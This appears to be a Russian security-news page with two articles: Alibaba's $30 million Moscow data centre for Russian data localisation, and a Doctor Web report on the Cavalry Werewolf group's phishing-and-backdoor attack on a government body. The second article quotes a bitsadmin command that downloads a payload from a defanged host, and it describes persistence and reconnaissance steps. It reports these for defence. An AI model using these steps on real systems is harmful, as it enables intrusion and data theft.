Alibaba потратит $30 млн на хранение данных в России

Alibaba потратит $30 млн на хранение данных в России

Alibaba потратит $30 млн на хранение данных в России

Китайская Alibaba арендовала под свои нужды дата-центр в Москве, рассказал РБК представитель AliExpress в России Антон Пантелеев. По его словам, центр обработки данных будет обслуживать ИТ-операции принадлежащих Alibaba маркетплейсов (торговых электронных площадок) — AliExpress и запущенного в конце сентября Tmall.

В ИТ-инфраструктуру и дата-центр компания собирается вложить около $30 млн (1,78 млрд руб. по текущему курсу ЦБ), на первом этапе будут установлены 200 серверных стоек (стандартных шкафов для размещения оборудования), пишет rbc.ru.

Оператором нового центра выступила компания Orange Business Services. «Мы предоставили шесть каналов с пропускной способностью 10 гигабит в секунду. Мы также занимаемся техническим обслуживанием дата-центра — Orange привлекла команду специалистов со знанием китайского языка для обеспечения круглосуточной бесперебойной работы всех систем и оборудования и оперативного взаимодействия с центром мониторинга в Китае», — рассказал РБК представитель Orange Business Services.

У кого Alibaba арендовала дата-центр, представитель компании не уточнил. По словам источника РБК на рынке дата-центров, это DataLine. В компании отказались от комментариев.

Россия в приоритете

По словам Пантелеева, за счет запуска собственного дата-центра средняя скорость загрузки страниц AliExpress и Tmall для российских пользователей должна увеличиться на 20%. Кроме того, собственный дата-центр позволит холдингу разрабатывать сервисы специально для российских пользователей, например поисковый движок на русском языке. Для этих же целей в последние полгода AliExpress нанял в России более десятка разработчиков, отметил представитель компании.

«Дата-центры размещаются в ключевых странах, и Россия входит в топ-3 приоритетных для нас рынков в мире, продажи здесь растут, недавно был запущен Tmall. Задача нового дата-центра — обрабатывать возросший поток заказов», — пояснил Пантелеев. Помимо AliExpress и Tmall он будет обслуживать и Ciaonao — логистическое бизнес-подразделение Alibaba.

Alibaba арендует серверные мощности в России с 2015 года, но в гораздо меньшем объеме, поэтому данные размещаются сразу в нескольких центрах обработки данных (ЦОД), рассказал Пантелеев. Собственный дата-центр должен консолидировать их в одном месте. Запуск дата-центра приурочен к Всемирному дню шопинга, который пройдет 11 ноября, чтобы обеспечить дополнительные серверные мощности в случае наплыва покупателей.

Ценные данные россиян

В новом дата-центре будут обрабатываться все ИТ-операции компании в России, в том числе храниться персональные данные российских пользователей сервисов Alibaba в рамках исполнения соответствующего закона, пояснил представитель компании.

В сентябре 2015 года вступили в силу поправки в закон «Об информации, информационных технологиях и защите информации», а также в закон «О персональных данных», согласно которым персональные данные россиян должны храниться внутри страны. В первую очередь он коснулся зарубежных компаний, которые были вынуждены начать перенос части серверов с информацией о российских пользователях. Среди крупных зарубежных компаний об установке серверов в России ранее заявляли интернет-магазин eBay, производитель мобильных устройств и компьютеров Apple, мессенджер Viber, интернет-сервис для бронирования отелей Booking.com, приложение для заказа поездок Uber, интернет-холдинг Google и производитель программного обеспечения Microsoft. Ряд компаний, например Twitter и Facebook, пока не сделали этого, но, как заявлял представитель Роскомнадзора (отслеживает исполнение закона о персональных данных), эти компании находятся в диалоге с ведомством.

В середине ноября 2016 года из-за невыполнения закона о хранении персональных данных в России по решению суда была заблокирована социальная сеть LinkedIn. Причем, как пояснял представитель Роскомнадзора, иск к этому ресурсу был подан из-за неоднократных сообщений об утечках личных данных пользователей.

По словам главы Ассоциации компаний интернет-торговли Алексея Федорова, открытие дата-центра Alibaba означает, что компания стала выполнять требования российского законодательства, а именно хранить данные россиян на территории России. «До этого, я уверен, Alibaba не выполняла это требование, это моя официальная позиция. Они хранили данные россиян за рубежом, в том же самом Китае. А сейчас решили соответствовать российскому закону», — считает он.

Федоров отметил, что $30 млн — это совсем немного, учитывая то, сколько компания вкладывает в развитие своего бизнеса в других странах. «Такой суммы хватит на то, чтобы арендовать недорогой и совсем небольшой дата-центр. Это совсем копеечные суммы по сравнению с тем, сколько Alibaba вкладывает, например, в Индию — только на развитие логистической сети она потратила там $6 млрд», — отметил эксперт.

Больше даты

​Требование о хранении персональных данных россиян в России называют одним из факторов роста рынка дата-центров в стране.

По данным исследовательской компании iKS-Consulting, по итогам 2016 года объем рынка коммерческих центров обработки данных составил 16,8 млрд руб., что на 21% выше, чем в 2015 году. В долларовом выражении он также увеличился и составил $250 млн (плюс 11% к прошлому году). По прогнозу iKS-Consulting, к концу 2017 года объем рынка ЦОД увеличится на 19%, до 20 млрд руб. К этому сроку, по ожиданиям аналитиков, общее количество стоек в российских дата-центрах возрастет на 24,5%, до 38 тыс. штук.

Руководитель сети дата-центров компании КРОК Павел Колмычек считает, что ощутимого влияния на рынок коммерческих дата-центров действия Alibaba не окажут. «Все 200 стоек будут задействованы и введены в эксплуатацию не сразу. Скорее всего, выход на полную мощность произойдет не ранее следующего года», — считает ​он.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

Группировка Cavalry Werewolf взломала сеть госоргана с помощью бэкдоров

В июле 2025 года к специалистам компании «Доктор Веб» обратился клиент из госсектора с жалобой на рассылку подозрительных писем с корпоративного почтового ящика. Расследование показало: перед ними была целевая кампания кибергруппировки, которую аналитики идентифицировали как Cavalry Werewolf.

Цель атаки — сбор конфиденциальной информации и картирование сети для дальнейшего закрепления внутри инфраструктуры.

Начали злоумышленники банально, но эффективно — с фишинга. В качестве «приманки» приходили архивы с паролем и вложенным бэкдором BackDoor.ShellNET.1 (основан на открытом проекте Reverse-Shell-CS). Файлы маскировались под служебные записки и другие официальные документы — имена были соответствующие, чтобы снизить бдительность получателя.

 

После запуска BackDoor.ShellNET.1 атакующие использовали стандартный для Windows инструмент bitsadmin для скачивания дополнительных полезных нагрузок (пример: bitsadmin /transfer www /download hxxp://…/winpot.exe). Среди загруженных модулей оказался стилер Trojan.FileSpyNET.5, который массово тянул документы (.doc/.docx/.xlsx/.pdf), текстовые файлы и изображения. Для скрытого доступа применяли BackDoor.Tunnel.41 (вариант ReverseSocks5) — с его помощью создавались SOCKS5-туннели и обеспечивалось скрытое подключение к заражённому ПК.

Дальше — больше: специалисты «Доктор Веб» обнаружили целый набор инструментов, как собственных, так и основанных на open-source. В арсенале группировки — скриптовые загрузчики (например, BAT.DownLoader.1138), «упакованные» трояны (Trojan.Packed2.49708, Trojan.Siggen31.54011 и т. п.), бэкдоры, управляемые через телеграм-ботов (BackDoor.Siggen2.5463, BackDoor.ShellNET.2), а также прокси-модули типа BackDoor.ReverseProxy.1. Некоторые варианты внедряли полезную нагрузку в легитимные процессы — например, инжектировали данные в aspnet_compiler.exe, чтобы бэкдор выполнялся в контексте доверенного приложения.

 

Интересно, что злоумышленники активно пользуются открытими решениями: либо берут код «как есть», либо модифицируют его под свои нужды. Для доставки следующей волны вредоносов они используют стандартные утилиты — PowerShell, bitsadmin, curl — а для сохранения присутствия в системе модифицируют автозагрузку через реестр (HKCU\...\Run) или ставят исполняемые файлы в C:\users\public\pictures и похожие публичные папки.

Атака Cavalry Werewolf показала типичную для целевых кампаний логику: разведка (whoami, ipconfig, просмотр директорий), проверка прокси и сети, затем загрузка инструментов и закрепление. Также злоумышленники могли позже использовать скомпрометированные устройства для перехода в другие сети — например, при смене работы жертвы — и разворачивать дальнейшие атаки через доверенные каналы.

Отдельные особенности группировки, которые отмечают аналитики «Доктор Веб»: предпочтение к open-source-инструментам, частое использование обратных шеллов и SOCKS-туннелей, внедрение вреда в видимо «безобидные» программы и управление через Telegram API. Фишинговые рассылки имитируют сообщения от государственных органов — это снижает подозрительность целевой аудитории и повышает шансы успешной компрометации.

Рекомендации для организаций — стандартный, но действенный набор мер: усилить фильтрацию почты и блокировку подозрительных вложений, ограничить возможность запуска bitsadmin/PowerShell неподписанных скриптов, включить контроль исполнения (application control) и EDR, регулярно проверять целевые публичные папки, применять многофакторную аутентификацию и оперативно реагировать на подозрительные соединения с неизвестными C2-адресами. При обнаружении инцидента — немедленно изолировать пострадавшие хосты и провести полноценную форензику, чтобы выявить степень компрометации.

Расследование «Доктор Веб» — ещё одно напоминание: даже крупные организации с государственным уровнем защиты уязвимы к грамотному фишингу и тому, что за ним следует. В современных целевых атаках именно сочетание человеческой ошибки и хорошо отлаженных инструментов злоумышленников делает наибольший ущерб.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru